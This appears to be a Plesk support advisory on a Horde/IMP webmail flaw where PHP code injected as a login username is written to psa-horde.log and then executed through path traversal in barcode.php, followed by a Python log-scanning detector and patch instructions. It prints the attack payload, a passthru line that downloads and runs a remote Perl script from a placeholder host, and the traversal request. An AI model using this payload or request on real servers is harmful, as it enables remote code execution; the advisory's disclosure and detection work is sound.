Horde/IMP Plesk Webmail Exploit

APPLIES TO:
  • Parallels Plesk Panel 9.3 for Linux/Unix
  • Parallels Plesk Panel 9.2 for Linux/Unix
  • Parallels Plesk Panel 9.0 for Linux/Unix
  • Parallels Plesk Panel 8.6 for Linux/Unix
  • Parallels Plesk Panel 9.3 for Windows
  • Parallels Plesk Panel 9.2 for Windows
  • Parallels Plesk Panel 9.0 for Windows
  • Parallels Plesk Panel 8.6 for Windows

Symptoms

The Horde/IMP package (versions 3.1.7-3.3.2) shipped with Plesk 8.x and with 9.x versions before 9.5.4 has a vulnerability that allows an attacker to run malicious code. The attacker submits a webmail login as a POST request to /horde/imp/redirect.php with PHP code in place of the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
This results in the PHP code being written to the /var/log/psa-horde/psa-horde.log file. Because of a second vulnerability, in the barcode.php file, the attacker can then make Horde execute the logged code with this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
This is what the requests the attacker makes and the resulting entry in the psa-horde.log file look like:
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
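The two log excerpts above are what a defender has to work with on an unpatched server. The following Python script is an added example, not part of the Parallels article or of Horde: it scans web-server access log lines and psa-horde.log lines for the two halves of this attack, a FAILED LOGIN entry whose username contains PHP tags and a barcode.php request whose type= parameter carries path traversal or a null byte, and reports source addresses that did both. The sample lines are constructed for the example (reserved IP addresses, example hostnames) and follow the formats shown in the excerpt; the regular expressions assume the common log format and the psa-horde.log line layout seen above.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the advisory's excerpt; the addresses,
# hostnames and timestamps are made up for this example.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Jan/2012:08:01:35 -0500] "GET /horde/util/barcode.php?type=../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0"',
    '198.51.100.4 - - [17/Jan/2012:08:05:01 -0500] "GET /horde/util/barcode.php?type=code128&text=12345 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]
SAMPLE_HORDE_LOG = [
    'Jan 17 08:01:19 HORDE [error] [imp] FAILED LOGIN 203.0.113.7 to localhost:143[imap/notls] as <?php echo "x"; ?>@example.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
    'Jan 17 08:03:02 HORDE [error] [imp] FAILED LOGIN 198.51.100.4 to localhost:143[imap/notls] as alice@example.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
]

ACCESS_IP_RE = re.compile(r'^(\S+) ')
# Query string of a barcode.php request, up to the next space or quote.
BARCODE_QUERY_RE = re.compile(r'/horde/util/barcode\.php\?([^\s"]*)')
# Source address and username of a Horde/IMP failed-login entry.
FAILED_LOGIN_RE = re.compile(r'FAILED LOGIN (\S+) to \S+ as (.*?) \[on line')
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)?', re.IGNORECASE)


def barcode_traversal(line):
    """Return the decoded type= value of a barcode.php request when it contains
    path traversal, a path separator or a null byte; otherwise None.
    Legitimate values are bare barcode names such as 'code128'."""
    m = BARCODE_QUERY_RE.search(line)
    if not m:
        return None
    for part in m.group(1).split('&'):
        key, _, value = part.partition('=')
        if key != 'type':
            continue
        value = unquote(value)  # %00 and %2e%2e only show up after decoding
        if '..' in value or '/' in value or '\\' in value or '\x00' in value:
            return value
    return None


def php_in_failed_login(line):
    """Return (ip, username) when a FAILED LOGIN entry carries PHP tags in the
    username, i.e. content that would execute if the log file were included."""
    m = FAILED_LOGIN_RE.search(line)
    if not m:
        return None
    ip, user = m.groups()
    if PHP_TAG_RE.search(user):
        return ip, user
    return None


def correlate(access_lines, horde_lines):
    """Sorted list of source addresses that both poisoned psa-horde.log and
    requested barcode.php with a traversal payload."""
    poisoners = set()
    for line in horde_lines:
        hit = php_in_failed_login(line)
        if hit:
            poisoners.add(hit[0])
    readers = set()
    for line in access_lines:
        if barcode_traversal(line):
            m = ACCESS_IP_RE.match(line)
            if m:
                readers.add(m.group(1))
    return sorted(poisoners & readers)


if __name__ == "__main__":
    for line in SAMPLE_ACCESS_LOG:
        hit = barcode_traversal(line)
        if hit:
            print("barcode.php traversal:", repr(hit))
    for line in SAMPLE_HORDE_LOG:
        hit = php_in_failed_login(line)
        if hit:
            print("PHP in username from", hit[0], ":", hit[1])
    print("addresses doing both:", correlate(SAMPLE_ACCESS_LOG, SAMPLE_HORDE_LOG))
```

Either half on its own is worth an alert: PHP tags in a username mean the log has already been poisoned, and a traversal or null byte in the type= parameter means someone is probing the include. The correlation simply raises confidence when one address did both, as in the excerpt above. Decoding the parameter before matching matters because the %00 in the original request only becomes a null byte after URL decoding.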

Resolution

Download the patch for Horde 3.1.7-3.3.2 that matches the platform your server runs on. Unzip it and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:


5bee747753f35b405aa781017ebd750d 49af2da0f2dd4c81e962790bbbd0c2b4 5fc602d72ea565f353b9320e2ef62a1b c9a51db9739ff1afe0e40fbfb2f7491d 328043b54e01cddd451fabf58e2a065e 1aa1c890c6389095129322a3a7c695a6 7bdfe0216e011d547a49a1324179002f 4cf552a419b63c46a83e80b4d83ff93f 67bc5ae39ea4ac36a5874b72e35ffc6b 5d735c0e028ee5b991e4fb80d34fb87f 6eab23e8dac1eb5df9820a41f94cf4b4 970a12d7813e6f20383aaae2db2a50d6 eaf03e7826482ed35cfffd6b443c593e 75b59b1c6cdbaf382ebb2e4d11777032 eebd3e4553e0e16d6c38a58d2d023118 56797cefb1efc9130f7c48a7d1db0f0c
